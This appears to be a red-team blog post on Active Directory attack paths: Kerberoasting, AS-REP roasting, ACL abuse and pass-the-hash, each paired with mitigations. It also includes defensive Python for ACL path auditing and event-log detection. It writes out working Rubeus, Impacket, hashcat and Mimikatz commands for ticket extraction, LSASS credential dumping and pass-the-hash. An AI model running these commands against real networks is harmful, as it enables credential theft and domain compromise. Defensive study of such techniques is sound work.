In the vast majority of our red team engagements against enterprise environments, the path from an initial foothold to full domain compromise runs through Active Directory. This is not because AD is uniquely insecure. It is because AD manages authentication and authorisation for the entire Windows environment, and most environments have accumulated years of misconfigurations, excessive delegations, and legacy settings that create reliable attack paths for an attacker who knows where to look.
Getting the Initial Foothold
Lateral movement in AD typically starts after an attacker has compromised a low-privileged user account or obtained code execution on a workstation. Common routes to the initial foothold include phishing (the most reliable), password spraying against externally exposed services, exploitation of unpatched vulnerabilities on internet-facing infrastructure, and compromise of a trusted vendor or contractor account.
Kerberoasting
Any authenticated domain user can request a Kerberos service ticket for any service principal name (SPN) registered in Active Directory. The service ticket is encrypted with a key derived from the service account's password (for RC4 tickets, that key is the account's NTLM hash). An attacker can extract the ticket and attempt to crack it offline, with no network noise and no account lockout.
```
# Enumerate Kerberoastable accounts (low-privilege user required)
# Using PowerView
Get-DomainUser -SPN | Select-Object SamAccountName, ServicePrincipalName, PasswordLastSet

# Request service tickets for offline cracking
# Using Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt /domain:corp.local

# Crack with Hashcat (mode 13100 = Kerberos TGS-REP etype 23)
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule
```

Mitigation: Ensure all service accounts use Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs), whose automatically rotated 120-character passwords are computationally infeasible to crack. For legacy SPNs that cannot be migrated, enforce AES-only encryption: RC4 tickets are far faster to crack.
AS-REP Roasting
Accounts that have the 'Do not require Kerberos preauthentication' flag set will respond to an AS-REQ with an encrypted blob that can be cracked offline — without any credentials required from the attacker. This setting is sometimes enabled for legacy application compatibility.
```
# Find accounts without Kerberos preauthentication (no creds needed)
# Using Impacket from Linux
python3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 10.0.0.1

# Crack with Hashcat (mode 18200 = Kerberos AS-REP etype 23)
hashcat -m 18200 asrep_hashes.txt wordlist.txt
```

ACL Abuse and Delegation Chains
Active Directory access control lists can grant one object significant power over another: GenericAll, GenericWrite, WriteOwner, WriteDACL. These permissions accumulate over time as administrators grant temporary access and forget to remove it. BloodHound maps these relationships into attack paths, often revealing that a low-privilege user has a three-hop chain to Domain Admin through a series of delegations that nobody intended.
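To make the "three-hop chain" concrete, here is an added example that is not from the original post and not BloodHound's own code: a breadth-first search over a constructed list of ACL entries that reports the shortest chain of takeover rights from a given principal to a tier-0 group. The object names, the edge list, the tier-0 set and the choice of which rights count as "dangerous" are assumptions made for illustration; a real audit would feed it the domain's exported ACLs instead.

```python
"""Find privilege-escalation paths through AD object ACLs.

Added example (not from the original post): a minimal BloodHound-style
path search over a constructed set of ACL edges. Object names, the
edge list and the tier-0 target set are all made up for illustration.
"""
from collections import deque

# Rights that let the holder take over the target object outright.
# These four are the ones the post names; treating them as the full set
# is an assumption of this example.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDACL"}

# Constructed ACL edges: (principal_with_right, right, target_object).
# In a real audit these come from an export of the domain's ACLs.
SAMPLE_ACES = [
    ("jdoe", "GenericWrite", "svc_backup"),
    ("svc_backup", "GenericAll", "HelpdeskGroup"),
    ("HelpdeskGroup", "WriteDACL", "Domain Admins"),
    ("jdoe", "ReadProperty", "Domain Admins"),   # benign right, ignored
    ("intern", "GenericAll", "PrintServers"),    # dead end, no onward edge
]

# Objects whose control equals control of the domain (constructed set).
TIER0 = {"Domain Admins", "Enterprise Admins"}


def build_graph(aces):
    """Adjacency map keeping only edges that grant a dangerous right."""
    graph = {}
    for principal, right, target in aces:
        if right in DANGEROUS_RIGHTS:
            graph.setdefault(principal, []).append((right, target))
    return graph


def find_path(aces, start, targets=TIER0):
    """Breadth-first search for the shortest chain of dangerous rights
    from `start` to any object in `targets`.

    Returns a list of (principal, right, target) hops, or None if the
    principal has no such path.
    """
    graph = build_graph(aces)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        for right, nxt in graph.get(node, []):
            hop = path + [(node, right, nxt)]
            if nxt in targets:
                return hop
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, hop))
    return None


def audit(aces, principals, targets=TIER0):
    """Report every listed principal that has a path to a tier-0 object."""
    findings = {}
    for p in principals:
        path = find_path(aces, p, targets)
        if path:
            findings[p] = path
    return findings


if __name__ == "__main__":
    for principal, path in audit(SAMPLE_ACES, ["jdoe", "intern"]).items():
        chain = " -> ".join(f"{a} [{r}] {b}" for a, r, b in path)
        print(f"{principal}: {len(path)} hops: {chain}")
```

Run against the constructed edges, `jdoe` is reported with a three-hop chain (GenericWrite on a service account, GenericAll on a group, WriteDACL on Domain Admins) while `intern` is not, because GenericAll on an unrelated object leads nowhere. The shortest path is the one to fix first: removing any single edge in it breaks the chain.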
Pass-the-Hash and Pass-the-Ticket
NTLM authentication accepts a hash in place of a plaintext password. If an attacker extracts an NTLM hash from memory (using tools like Mimikatz against LSASS), they can authenticate as that user to any service that accepts NTLM without ever knowing the plaintext password. Kerberos tickets extracted from memory can similarly be injected into new sessions.
```
# Extract credentials from LSASS (requires local admin or SYSTEM)
# Using Mimikatz - for authorised testing only
privilege::debug
sekurlsa::logonpasswords

# Pass-the-Hash with extracted NTLM hash
sekurlsa::pth /user:administrator /domain:corp.local /ntlm:aad3b435b51404eeaad3b435b51404ee /run:cmd.exe
```

Key Defensive Controls
| Attack | Primary Mitigation | Detection Signal |
|---|---|---|
| Kerberoasting | gMSA for all service accounts | 4769 events with RC4 encryption type |
| AS-REP Roasting | Require preauthentication on all accounts | 4768 events for DONT_REQ_PREAUTH accounts |
| Pass-the-Hash | Enable Credential Guard, disable NTLM where possible | 4624 logon type 3 with NTLM authentication |
| ACL Abuse | Regular ACL audits with BloodHound | 4662 events on sensitive objects |
| DCSync | Restrict Replication Directory Changes permissions | 4662 with Replicating Directory Changes rights |
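The detection column of the table maps onto a handful of fields in Windows Security events. The following is an added example, not from the original post, that applies those signals as rules over constructed, already-parsed Security log records. The field names (TicketEncryptionType, PreAuthType, LogonType, AuthenticationPackageName, Properties) follow the Windows event schema; the sample records, the per-account SPN threshold used for the Kerberoasting rule, and the account names are all made up for illustration. The two replication GUIDs are the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights that appear in 4662 when an account performs replication.

```python
"""Apply the post's detection signals to Windows Security events.

Added example (not from the original post): a small rule set run over
constructed Security log records. Sample events and the roasting
threshold are made up; field names follow the Windows event schema.
"""
from collections import Counter

RC4_HMAC = "0x17"     # etype 23, the RC4 type hashcat modes 13100/18200 target
NO_PREAUTH = "0"      # 4768 Pre-Authentication Type 0 = logon without preauth
# Control-access-right GUIDs for DS-Replication-Get-Changes(-All). They show
# up in the Properties field of 4662 when an account replicates (DCSync).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}
# Distinct SPNs one account may request with RC4 before we call it roasting.
# Constructed tuning value for this example, not a vendor default.
ROAST_SPN_THRESHOLD = 3

# Constructed records, as a SIEM would hand them over after parsing the XML.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "MSSQLSvc/db01", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "HTTP/web01", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "CIFS/fs01", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "HTTP/web01", "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "asmith", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4624, "TargetUserName": "administrator", "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.55"},
    {"EventID": 4624, "TargetUserName": "asmith", "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.21"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectName": "DC=corp,DC=local", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def detect(events, roast_threshold=ROAST_SPN_THRESHOLD):
    """Return a list of (rule, account, detail) findings."""
    findings = []
    rc4_spns = {}   # account -> set of SPNs requested with RC4

    for ev in events:
        eid = ev["EventID"]
        if eid == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
            rc4_spns.setdefault(ev["TargetUserName"], set()).add(ev["ServiceName"])
        elif eid == 4768 and ev.get("PreAuthType") == NO_PREAUTH:
            # A TGT was issued without preauth: this account is AS-REP roastable
            findings.append(("asrep_roasting", ev["TargetUserName"], "preauth disabled"))
        elif (eid == 4624 and ev.get("LogonType") == "3"
              and ev.get("AuthenticationPackageName") == "NTLM"):
            # Network logon over NTLM: candidate for pass-the-hash review.
            # Noisy on its own; correlate with source host and account tier.
            findings.append(("ntlm_network_logon", ev["TargetUserName"], ev.get("IpAddress", "")))
        elif eid == 4662:
            props = ev.get("Properties", "").lower()
            if any(g in props for g in REPLICATION_GUIDS):
                findings.append(("dcsync", ev["SubjectUserName"], ev.get("ObjectName", "")))

    # Kerberoasting shows up as one account pulling RC4 tickets for many services
    for account, spns in rc4_spns.items():
        if len(spns) >= roast_threshold:
            findings.append(("kerberoasting", account, f"{len(spns)} RC4 service tickets"))
    return findings


def summary(findings):
    """Count findings per rule, for a quick triage view."""
    return Counter(rule for rule, _, _ in findings)


if __name__ == "__main__":
    for rule, account, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:20s} {account:25s} {detail}")
```

On the constructed records this yields one finding per row of the table's attack column: `jdoe` requesting three RC4 service tickets, `svc_legacy` receiving an AS-REP without preauth, one NTLM network logon for `administrator`, and a 4662 carrying both replication rights. The AES request by `asmith` is correctly ignored, which is also why the gMSA-plus-AES mitigation makes the 4769 signal cleaner: once RC4 is gone from legitimate traffic, any remaining RC4 request is worth a look.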
Active Directory hardening is not a one-time exercise. Attack paths are created continuously as permissions are granted, systems are added, and configurations drift. Running BloodHound against your own environment quarterly and acting on the high-severity paths it surfaces is the single highest-impact operational security practice for most enterprise environments.